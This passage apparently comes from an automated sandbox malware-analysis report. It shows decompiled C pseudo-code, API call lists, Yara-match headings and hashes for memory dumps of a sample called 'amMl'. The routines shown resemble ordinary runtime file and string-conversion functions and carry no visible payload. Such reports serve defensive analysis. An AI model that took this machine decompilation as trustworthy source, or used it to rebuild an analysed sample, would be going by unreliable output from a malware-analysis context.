                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                      • API String ID: 1646373207-3105848591
                                                                      • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                      • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                      • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                      • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • lstrlen.KERNEL32(?), ref: 005B1B6D
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 005B1B96
                                                                      • GetLastError.KERNEL32 ref: 005B1BA7
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 005B1BBF
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 005B1BE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                      • String ID:
                                                                      • API String ID: 3322701435-0
                                                                      • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                      • Instruction ID: 859f9b5943f54f41986ed50512bc1cb0ca4cd3a24e890e68ec14ec48eaabf096
                                                                      • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                      • Instruction Fuzzy Hash: 7F11C4315007547BD3309715CC98FA77F6CFBC6BA9F408114FD459A281D621BC04C6B8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 84%
                                                                      			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                                      				void* __ebx;
                                                                      				void* __ebp;
                                                                      				signed int _t12;
                                                                      				void* _t21;
                                                                      				int _t25;
                                                                      				void* _t30;
                                                                      				int _t32;
                                                                      				char* _t35;
                                                                      
                                                                      				_t21 = __edx;
                                                                      				_t35 = _a4;
                                                                      				_t17 = __ecx;
                                                                      				if(_t35 != 0) {
                                                                      					_t25 = lstrlenA(_t35) + 1;
                                                                      					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                                      					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25);
                                                                      					asm("sbb esi, esi");
                                                                      					_t30 =  ~_t12 + 1;
                                                                      					if(_t30 != 0) {
                                                                      						_t12 = GetLastError();
                                                                      						if(_t12 == 0x7a) {
                                                                      							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                                      							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                                      							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                                      							asm("sbb esi, esi");
                                                                      							_t30 =  ~_t12 + 1;
                                                                      						}
                                                                      						if(_t30 != 0) {
                                                                      							_t12 = E00401030();
                                                                      						}
                                                                      					}
                                                                      					return _t12;
                                                                      				} else {
                                                                      					 *__ecx = _t35;
                                                                      					return __eax;
                                                                      				}
                                                                      			}











                                                                      0x004018f0
                                                                      0x004018f2
                                                                      0x004018f6
                                                                      0x004018fa
                                                                      0x00401917
                                                                      0x0040191a
                                                                      0x0040192f
                                                                      0x00401939
                                                                      0x0040193b
                                                                      0x0040193e
                                                                      0x00401940
                                                                      0x00401949
                                                                      0x0040195e
                                                                      0x0040196b
                                                                      0x00401980
                                                                      0x0040198a
                                                                      0x0040198c
                                                                      0x0040198c
                                                                      0x0040198f
                                                                      0x00401991
                                                                      0x00401991
                                                                      0x0040198f
                                                                      0x0040199a
                                                                      0x004018fc
                                                                      0x004018fc
                                                                      0x00401900
                                                                      0x00401900

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(?), ref: 00401906
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                      • GetLastError.KERNEL32 ref: 00401940
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                      • String ID:
                                                                      • API String ID: 3322701435-0
                                                                      • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                      • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                      • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                      • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __fileno.LIBCMT ref: 005BC9E3
                                                                      • __locking.LIBCMT ref: 005BC9F8
                                                                        • Part of subcall function 005BC228: __getptd_noexit.LIBCMT ref: 005BC228
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __fileno__getptd_noexit__locking
                                                                      • String ID:
                                                                      • API String ID: 630670418-0
                                                                      • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                      • Instruction ID: 427126178eeeca7fb8d918f996eccd81bc4eed112a630e07ee1ff0dc58c4075d
                                                                      • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                      • Instruction Fuzzy Hash: 19518F71E00209ABDB10CF68C986BEDBFB1FF45354F6481A9D915AB281D730BE40DB88
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E0040C748(void* __edx, void* __esi, char _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				signed int _t70;
                                                                      				signed int _t71;
                                                                      				intOrPtr _t73;
                                                                      				signed int _t75;
                                                                      				signed int _t81;
                                                                      				char _t82;
                                                                      				signed int _t84;
                                                                      				intOrPtr* _t86;
                                                                      				signed int _t87;
                                                                      				intOrPtr* _t90;
                                                                      				signed int _t92;
                                                                      				signed int _t94;
                                                                      				void* _t96;
                                                                      				signed char _t98;
                                                                      				signed int _t99;
                                                                      				intOrPtr _t102;
                                                                      				signed int _t103;
                                                                      				intOrPtr* _t104;
                                                                      				signed int _t111;
                                                                      				signed int _t114;
                                                                      				intOrPtr _t115;
                                                                      
                                                                      				_t105 = __esi;
                                                                      				_t97 = __edx;
                                                                      				_t104 = _a4;
                                                                      				_t87 = 0;
                                                                      				_t121 = _t104;
                                                                      				if(_t104 != 0) {
                                                                      					_t70 = E0040FA20(__edx, _t104, _t104);
                                                                      					__eflags =  *(_t104 + 4);
                                                                      					_v8 = _t70;
                                                                      					if(__eflags < 0) {
                                                                      						 *(_t104 + 4) = 0;
                                                                      					}
                                                                      					_push(1);
                                                                      					_push(_t87);
                                                                      					_push(_t70);
                                                                      					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                                                                      					__eflags = _t71 - _t87;
                                                                      					_v12 = _t71;
                                                                      					if(_t71 < _t87) {
                                                                      						L2:
                                                                      						return _t71 | 0xffffffff;
                                                                      					} else {
                                                                      						_t98 =  *(_t104 + 0xc);
                                                                      						__eflags = _t98 & 0x00000108;
                                                                      						if((_t98 & 0x00000108) != 0) {
                                                                      							_t73 =  *_t104;
                                                                      							_t92 =  *(_t104 + 8);
                                                                      							_push(_t105);
                                                                      							_v16 = _t73 - _t92;
                                                                      							__eflags = _t98 & 0x00000003;
                                                                      							if((_t98 & 0x00000003) == 0) {
                                                                      								__eflags = _t98;
                                                                      								if(__eflags < 0) {
                                                                      									L15:
                                                                      									__eflags = _v12 - _t87;
                                                                      									if(_v12 != _t87) {
                                                                      										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                                      										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                                      											L40:
                                                                      											_t75 = _v16 + _v12;
                                                                      											__eflags = _t75;
                                                                      											L41:
                                                                      											return _t75;
                                                                      										}
                                                                      										_t99 =  *(_t104 + 4);
                                                                      										__eflags = _t99 - _t87;
                                                                      										if(_t99 != _t87) {
                                                                      											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                                                                      											_a4 = _t73 - _t92 + _t99;
                                                                      											_t111 = (_v8 & 0x0000001f) << 6;
                                                                      											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                                      											if(__eflags == 0) {
                                                                      												L39:
                                                                      												_t66 =  &_v12;
                                                                      												 *_t66 = _v12 - _a4;
                                                                      												__eflags =  *_t66;
                                                                      												goto L40;
                                                                      											}
                                                                      											_push(2);
                                                                      											_push(0);
                                                                      											_push(_v8);
                                                                      											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                                      											if(__eflags != 0) {
                                                                      												_push(0);
                                                                      												_push(_v12);
                                                                      												_push(_v8);
                                                                      												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                                                                      												__eflags = _t81;
                                                                      												if(_t81 >= 0) {
                                                                      													_t82 = 0x200;
                                                                      													__eflags = _a4 - 0x200;
                                                                      													if(_a4 > 0x200) {
                                                                      														L35:
                                                                      														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                                      														L36:
                                                                      														_a4 = _t82;
                                                                      														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                                      														L37:
                                                                      														if(__eflags != 0) {
                                                                      															_t63 =  &_a4;
                                                                      															 *_t63 = _a4 + 1;
                                                                      															__eflags =  *_t63;
                                                                      														}
                                                                      														goto L39;
                                                                      													}
                                                                      													_t94 =  *(_t104 + 0xc);
                                                                      													__eflags = _t94 & 0x00000008;
                                                                      													if((_t94 & 0x00000008) == 0) {
                                                                      														goto L35;
                                                                      													}
                                                                      													__eflags = _t94 & 0x00000400;
                                                                      													if((_t94 & 0x00000400) == 0) {
                                                                      														goto L36;
                                                                      													}
                                                                      													goto L35;
                                                                      												}
                                                                      												L31:
                                                                      												_t75 = _t81 | 0xffffffff;
                                                                      												goto L41;
                                                                      											}
                                                                      											_t84 =  *(_t104 + 8);
                                                                      											_t96 = _a4 + _t84;
                                                                      											while(1) {
                                                                      												__eflags = _t84 - _t96;
                                                                      												if(_t84 >= _t96) {
                                                                      													break;
                                                                      												}
                                                                      												__eflags =  *_t84 - 0xa;
                                                                      												if( *_t84 == 0xa) {
                                                                      													_t44 =  &_a4;
                                                                      													 *_t44 = _a4 + 1;
                                                                      													__eflags =  *_t44;
                                                                      												}
                                                                      												_t84 = _t84 + 1;
                                                                      												__eflags = _t84;
                                                                      											}
                                                                      											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                                      											goto L37;
                                                                      										}
                                                                      										_v16 = _t87;
                                                                      										goto L40;
                                                                      									}
                                                                      									_t75 = _v16;
                                                                      									goto L41;
                                                                      								}
                                                                      								_t81 = E0040BFC1(__eflags);
                                                                      								 *_t81 = 0x16;
                                                                      								goto L31;
                                                                      							}
                                                                      							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                                                                      							_t114 = (_v8 & 0x0000001f) << 6;
                                                                      							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                                      							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                                      								goto L15;
                                                                      							}
                                                                      							_t103 = _t92;
                                                                      							__eflags = _t103 - _t73;
                                                                      							if(_t103 >= _t73) {
                                                                      								goto L15;
                                                                      							}
                                                                      							_t115 = _t73;
                                                                      							do {
                                                                      								__eflags =  *_t103 - 0xa;
                                                                      								if( *_t103 == 0xa) {
                                                                      									_v16 = _v16 + 1;
                                                                      									_t87 = 0;
                                                                      									__eflags = 0;
                                                                      								}
                                                                      								_t103 = _t103 + 1;
                                                                      								__eflags = _t103 - _t115;
                                                                      							} while (_t103 < _t115);
                                                                      							goto L15;
                                                                      						}
                                                                      						return _t71 -  *(_t104 + 4);
                                                                      					}
                                                                      				}
                                                                      				_t86 = E0040BFC1(_t121);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				 *_t86 = 0x16;
                                                                      				_t71 = E0040E744(__edx, _t104, __esi);
                                                                      				goto L2;
                                                                      			}






























                                                                      0x0040c748
                                                                      0x0040c748
                                                                      0x0040c752
                                                                      0x0040c755
                                                                      0x0040c757
                                                                      0x0040c759
                                                                      0x0040c77c
                                                                      0x0040c781
                                                                      0x0040c785
                                                                      0x0040c788
                                                                      0x0040c78a
                                                                      0x0040c78a
                                                                      0x0040c78d
                                                                      0x0040c78f
                                                                      0x0040c790
                                                                      0x0040c791
                                                                      0x0040c799
                                                                      0x0040c79b
                                                                      0x0040c79e
                                                                      0x0040c773
                                                                      0x00000000
                                                                      0x0040c7a0
                                                                      0x0040c7a0
                                                                      0x0040c7a3
                                                                      0x0040c7a9
                                                                      0x0040c7b3
                                                                      0x0040c7b5
                                                                      0x0040c7b8
                                                                      0x0040c7bd
                                                                      0x0040c7c0
                                                                      0x0040c7c3
                                                                      0x0040c806
                                                                      0x0040c808
                                                                      0x0040c7f9
                                                                      0x0040c7f9
                                                                      0x0040c7fc
                                                                      0x0040c81a
                                                                      0x0040c81e
                                                                      0x0040c8d8
                                                                      0x0040c8de
                                                                      0x0040c8de
                                                                      0x0040c8e0
                                                                      0x00000000
                                                                      0x0040c8e0
                                                                      0x0040c824
                                                                      0x0040c827
                                                                      0x0040c829
                                                                      0x0040c843
                                                                      0x0040c84a
                                                                      0x0040c84f
                                                                      0x0040c852
                                                                      0x0040c857
                                                                      0x0040c8d2
                                                                      0x0040c8d5
                                                                      0x0040c8d5
                                                                      0x0040c8d5
                                                                      0x00000000
                                                                      0x0040c8d5
                                                                      0x0040c859
                                                                      0x0040c85b
                                                                      0x0040c85d
                                                                      0x0040c868
                                                                      0x0040c86b
                                                                      0x0040c88d
                                                                      0x0040c88f
                                                                      0x0040c892
                                                                      0x0040c895
                                                                      0x0040c89d
                                                                      0x0040c89f
                                                                      0x0040c8a6
                                                                      0x0040c8ab
                                                                      0x0040c8ae
                                                                      0x0040c8c0
                                                                      0x0040c8c0
                                                                      0x0040c8c3
                                                                      0x0040c8c3
                                                                      0x0040c8c8
                                                                      0x0040c8cd
                                                                      0x0040c8cd
                                                                      0x0040c8cf
                                                                      0x0040c8cf
                                                                      0x0040c8cf
                                                                      0x0040c8cf
                                                                      0x00000000
                                                                      0x0040c8cd
                                                                      0x0040c8b0
                                                                      0x0040c8b3
                                                                      0x0040c8b6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040c8b8
                                                                      0x0040c8be
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040c8be
                                                                      0x0040c8a1
                                                                      0x0040c8a1
                                                                      0x00000000
                                                                      0x0040c8a1
                                                                      0x0040c86d
                                                                      0x0040c873
                                                                      0x0040c880
                                                                      0x0040c880
                                                                      0x0040c882
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040c877
                                                                      0x0040c87a
                                                                      0x0040c87c
                                                                      0x0040c87c
                                                                      0x0040c87c
                                                                      0x0040c87c
                                                                      0x0040c87f
                                                                      0x0040c87f
                                                                      0x0040c87f
                                                                      0x0040c884
                                                                      0x00000000
                                                                      0x0040c884
                                                                      0x0040c82b
                                                                      0x00000000
                                                                      0x0040c82b
                                                                      0x0040c7fe
                                                                      0x00000000
                                                                      0x0040c7fe
                                                                      0x0040c80a
                                                                      0x0040c80f
                                                                      0x00000000
                                                                      0x0040c80f
                                                                      0x0040c7ce
                                                                      0x0040c7d8
                                                                      0x0040c7db
                                                                      0x0040c7e0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040c7e2
                                                                      0x0040c7e4
                                                                      0x0040c7e6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040c7e8
                                                                      0x0040c7ea
                                                                      0x0040c7ea
                                                                      0x0040c7ed
                                                                      0x0040c7ef
                                                                      0x0040c7f2
                                                                      0x0040c7f2
                                                                      0x0040c7f2
                                                                      0x0040c7f4
                                                                      0x0040c7f5
                                                                      0x0040c7f5
                                                                      0x00000000
                                                                      0x0040c7ea
                                                                      0x00000000
                                                                      0x0040c7ab
                                                                      0x0040c79e
                                                                      0x0040c75b
                                                                      0x0040c760
                                                                      0x0040c761
                                                                      0x0040c762
                                                                      0x0040c763
                                                                      0x0040c764
                                                                      0x0040c765
                                                                      0x0040c76b
                                                                      0x00000000

                                                                      APIs
                                                                      • __fileno.LIBCMT ref: 0040C77C
                                                                      • __locking.LIBCMT ref: 0040C791
                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                      • String ID:
                                                                      • API String ID: 2395185920-0
                                                                      • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                      • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                      • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                      • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __fileno__flsbuf__flush__getptd_noexit__locking
                                                                      • String ID:
                                                                      • API String ID: 1291973410-0
                                                                      • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                      • Instruction ID: afd7f4f556a4b1427020b727b7a49a5a7884608ae4ee4503a86ee27d0761e640
                                                                      • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                      • Instruction Fuzzy Hash: 68418231A00609AFEB249F6988856EEBFB5FF80720F248529E5559B150E7F4FE41CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _fseek_malloc_memset
                                                                      • String ID:
                                                                      • API String ID: 208892515-0
                                                                      • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                      • Instruction ID: 6ec82804641fa7fbcea70460e36997f73a791347a8a3505df7978e5fccc20a98
                                                                      • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                      • Instruction Fuzzy Hash: 9441D672600B154AD730AA2EE90D7A7BAE5BFC0354F140A2DE596C27D0E775F845C741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 97%
                                                                      			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t30;
                                                                      				signed int _t31;
                                                                      				signed int _t32;
                                                                      				signed int _t33;
                                                                      				signed int _t35;
                                                                      				signed int _t39;
                                                                      				void* _t42;
                                                                      				intOrPtr _t43;
                                                                      				void* _t45;
                                                                      				signed int _t48;
                                                                      				signed int* _t53;
                                                                      				void* _t54;
                                                                      				void* _t55;
                                                                      				void* _t57;
                                                                      
                                                                      				_t54 = __ebp;
                                                                      				_t45 = __edx;
                                                                      				_t42 = __ebx;
                                                                      				_t53 = _a4;
                                                                      				if(_t53 == 0) {
                                                                      					L40:
                                                                      					_t31 = _t30 | 0xffffffff;
                                                                      					__eflags = _t31;
                                                                      					return _t31;
                                                                      				} else {
                                                                      					_t43 = _a12;
                                                                      					if(_t43 == 2) {
                                                                      						goto L40;
                                                                      					} else {
                                                                      						_t30 = _t53[0xe];
                                                                      						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                                      							goto L40;
                                                                      						} else {
                                                                      							_t48 = _a8;
                                                                      							if(_t53[0x17] != 0x77) {
                                                                      								__eflags = _t43 - 1;
                                                                      								if(_t43 == 1) {
                                                                      									_t48 = _t48 + _t53[0x1a];
                                                                      									__eflags = _t48;
                                                                      								}
                                                                      								__eflags = _t48;
                                                                      								if(_t48 < 0) {
                                                                      									goto L39;
                                                                      								} else {
                                                                      									__eflags = _t53[0x16];
                                                                      									if(__eflags == 0) {
                                                                      										_t33 = _t53[0x1a];
                                                                      										__eflags = _t48 - _t33;
                                                                      										if(_t48 < _t33) {
                                                                      											_t30 = E004054F0(_t42, _t54, _t53);
                                                                      											_t55 = _t55 + 4;
                                                                      											__eflags = _t30;
                                                                      											if(_t30 < 0) {
                                                                      												goto L39;
                                                                      											} else {
                                                                      												goto L27;
                                                                      											}
                                                                      										} else {
                                                                      											_t48 = _t48 - _t33;
                                                                      											L27:
                                                                      											__eflags = _t48;
                                                                      											if(_t48 == 0) {
                                                                      												L38:
                                                                      												return _t53[0x1a];
                                                                      											} else {
                                                                      												__eflags = _t53[0x12];
                                                                      												if(_t53[0x12] != 0) {
                                                                      													L30:
                                                                      													__eflags = _t53[0x1b] - 0xffffffff;
                                                                      													if(_t53[0x1b] != 0xffffffff) {
                                                                      														_t53[0x1a] = _t53[0x1a] + 1;
                                                                      														_t48 = _t48 - 1;
                                                                      														__eflags = _t53[0x1c];
                                                                      														_t53[0x1b] = 0xffffffff;
                                                                      														if(_t53[0x1c] != 0) {
                                                                      															_t53[0xe] = 1;
                                                                      														}
                                                                      													}
                                                                      													__eflags = _t48;
                                                                      													if(_t48 <= 0) {
                                                                      														goto L38;
                                                                      													} else {
                                                                      														while(1) {
                                                                      															_t35 = 0x4000;
                                                                      															__eflags = _t48 - 0x4000;
                                                                      															if(_t48 < 0x4000) {
                                                                      																_t35 = _t48;
                                                                      															}
                                                                      															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                                                                      															_t55 = _t55 + 0xc;
                                                                      															__eflags = _t30;
                                                                      															if(_t30 <= 0) {
                                                                      																goto L39;
                                                                      															}
                                                                      															_t48 = _t48 - _t30;
                                                                      															__eflags = _t48;
                                                                      															if(_t48 > 0) {
                                                                      																continue;
                                                                      															} else {
                                                                      																goto L38;
                                                                      															}
                                                                      															goto L41;
                                                                      														}
                                                                      														goto L39;
                                                                      													}
                                                                      												} else {
                                                                      													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                      													_t55 = _t55 + 4;
                                                                      													_t53[0x12] = _t30;
                                                                      													__eflags = _t30;
                                                                      													if(_t30 == 0) {
                                                                      														goto L39;
                                                                      													} else {
                                                                      														goto L30;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										_push(0);
                                                                      										_push(_t48);
                                                                      										_push(_t53[0x10]);
                                                                      										_t53[0x1b] = 0xffffffff;
                                                                      										_t53[1] = 0;
                                                                      										 *_t53 = _t53[0x11];
                                                                      										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                      										__eflags = _t30;
                                                                      										if(_t30 < 0) {
                                                                      											goto L39;
                                                                      										} else {
                                                                      											_t53[0x1a] = _t48;
                                                                      											_t53[0x19] = _t48;
                                                                      											return _t48;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							} else {
                                                                      								if(_t43 == 0) {
                                                                      									_t48 = _t48 - _t53[0x19];
                                                                      								}
                                                                      								if(_t48 < 0) {
                                                                      									L39:
                                                                      									_t32 = _t30 | 0xffffffff;
                                                                      									__eflags = _t32;
                                                                      									return _t32;
                                                                      								} else {
                                                                      									if(_t53[0x11] != 0) {
                                                                      										L11:
                                                                      										if(_t48 <= 0) {
                                                                      											L17:
                                                                      											return _t53[0x19];
                                                                      										} else {
                                                                      											while(1) {
                                                                      												_t39 = 0x4000;
                                                                      												if(_t48 < 0x4000) {
                                                                      													_t39 = _t48;
                                                                      												}
                                                                      												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                                                                      												_t55 = _t55 + 0xc;
                                                                      												if(_t30 == 0) {
                                                                      													goto L39;
                                                                      												}
                                                                      												_t48 = _t48 - _t30;
                                                                      												if(_t48 > 0) {
                                                                      													continue;
                                                                      												} else {
                                                                      													goto L17;
                                                                      												}
                                                                      												goto L41;
                                                                      											}
                                                                      											goto L39;
                                                                      										}
                                                                      									} else {
                                                                      										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                      										_t57 = _t55 + 4;
                                                                      										_t53[0x11] = _t30;
                                                                      										if(_t30 == 0) {
                                                                      											goto L39;
                                                                      										} else {
                                                                      											E0040BA30(_t48, _t30, 0, 0x4000);
                                                                      											_t55 = _t57 + 0xc;
                                                                      											goto L11;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L41:
                                                                      			}



















                                                                      0x00405d00
                                                                      0x00405d00
                                                                      0x00405d00
                                                                      0x00405d01
                                                                      0x00405d07
                                                                      0x00405e7f
                                                                      0x00405e7f
                                                                      0x00405e7f
                                                                      0x00405e83
                                                                      0x00405d0d
                                                                      0x00405d0d
                                                                      0x00405d14
                                                                      0x00000000
                                                                      0x00405d1a
                                                                      0x00405d1a
                                                                      0x00405d20
                                                                      0x00000000
                                                                      0x00405d2f
                                                                      0x00405d34
                                                                      0x00405d38
                                                                      0x00405dad
                                                                      0x00405db0
                                                                      0x00405db2
                                                                      0x00405db2
                                                                      0x00405db2
                                                                      0x00405db5
                                                                      0x00405db7
                                                                      0x00000000
                                                                      0x00405dbd
                                                                      0x00405dbd
                                                                      0x00405dc1
                                                                      0x00405df8
                                                                      0x00405dfb
                                                                      0x00405dfd
                                                                      0x00405e04
                                                                      0x00405e09
                                                                      0x00405e0c
                                                                      0x00405e0e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405dff
                                                                      0x00405dff
                                                                      0x00405e10
                                                                      0x00405e10
                                                                      0x00405e12
                                                                      0x00405e73
                                                                      0x00405e78
                                                                      0x00405e14
                                                                      0x00405e14
                                                                      0x00405e18
                                                                      0x00405e2e
